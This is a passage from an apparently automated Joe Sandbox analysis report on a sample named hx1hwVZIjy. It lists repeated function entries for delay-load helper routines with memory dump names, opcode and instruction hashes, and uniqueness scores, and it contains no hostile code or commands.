                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 335f229eebb9cfd195cdadcfb49733d217d136ca06d1f40c9d54deba7a399835
                  • Instruction ID: bab5dd6e457fb7d7fabfdf9d9be19d6111c7d37baf920af5ff136f0b01042080
                  • Opcode Fuzzy Hash: 335f229eebb9cfd195cdadcfb49733d217d136ca06d1f40c9d54deba7a399835
                  • Instruction Fuzzy Hash: 8AB0129667D201BC354C61046C22E36372CC1C0B20330451BBA09D0153E5849C887032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c710ae196816a762cb09ae3e4fca39ab156c467cf79fec62bf053513467e8cb7
                  • Instruction ID: efe5f95061fa4c69baf360a8634c845a4cdf6cb0ca7906ace4c3f40bf1c29c09
                  • Opcode Fuzzy Hash: c710ae196816a762cb09ae3e4fca39ab156c467cf79fec62bf053513467e8cb7
                  • Instruction Fuzzy Hash: 47B0129666C205BC314C21006E22D36372CC2C0B20330461BBA05E0043A5849CC87032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 3ddcda37ec907cf05183ef21e0dcc18afb62397d7b9104d13f88a9b94108bbb8
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: 3ddcda37ec907cf05183ef21e0dcc18afb62397d7b9104d13f88a9b94108bbb8
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6da8b927f9ad00f62078625828ff685e99c2837303326f871d28bde15e371b7d
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: 6da8b927f9ad00f62078625828ff685e99c2837303326f871d28bde15e371b7d
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: eca2c4c301bfbac59e44c80ec6b7e25a76e6291972b6584ee115a51b5cf06204
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: eca2c4c301bfbac59e44c80ec6b7e25a76e6291972b6584ee115a51b5cf06204
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b89d8b1b963461d92802d9b3a9c292fd3bd97584d1b674bc6363e543a7ac4da4
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: b89d8b1b963461d92802d9b3a9c292fd3bd97584d1b674bc6363e543a7ac4da4
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b4b6fbd36b1a8ac1274615c6a69af3493d2a2dbbbaf86b53584f8b8131fbdc96
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: b4b6fbd36b1a8ac1274615c6a69af3493d2a2dbbbaf86b53584f8b8131fbdc96
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2b5a8740bf183f11c07784bb0178451c78a4e9427c1d04780e4e65d86f1aa18
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: d2b5a8740bf183f11c07784bb0178451c78a4e9427c1d04780e4e65d86f1aa18
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ba7fcef177e144b2769dd51eeaa08d962294a6ca1d8c010a656c043fbb002612
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: ba7fcef177e144b2769dd51eeaa08d962294a6ca1d8c010a656c043fbb002612
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: af15bab0c0edce6cfbd2bb9b6090eb252bc0588f253759ba2a9e9b9bca860c4f
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: af15bab0c0edce6cfbd2bb9b6090eb252bc0588f253759ba2a9e9b9bca860c4f
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: cfd768160f3ba08e7b36c3655817eca09ad519238efa6cfd80de3b6b315cb10b
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: cfd768160f3ba08e7b36c3655817eca09ad519238efa6cfd80de3b6b315cb10b
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 516b30b41d345f7c1c2c6fe6632d8f6573465c67c21fbe07f509f383727486ec
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: 516b30b41d345f7c1c2c6fe6632d8f6573465c67c21fbe07f509f383727486ec
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a1ac40134003283f4caf270eec49e9481aef6327f1c04fc8d99f73eb00168aab
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: a1ac40134003283f4caf270eec49e9481aef6327f1c04fc8d99f73eb00168aab
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 66198a17943fb846f87164867a3ed44b522bb8b538ebf5ce5e2ff4a3de6196c5
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 66198a17943fb846f87164867a3ed44b522bb8b538ebf5ce5e2ff4a3de6196c5
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7c5f4fb1df1bbee244d9fadf27902c97e3390bdab7cbdf5392ecea2606bdb2bd
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 7c5f4fb1df1bbee244d9fadf27902c97e3390bdab7cbdf5392ecea2606bdb2bd
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
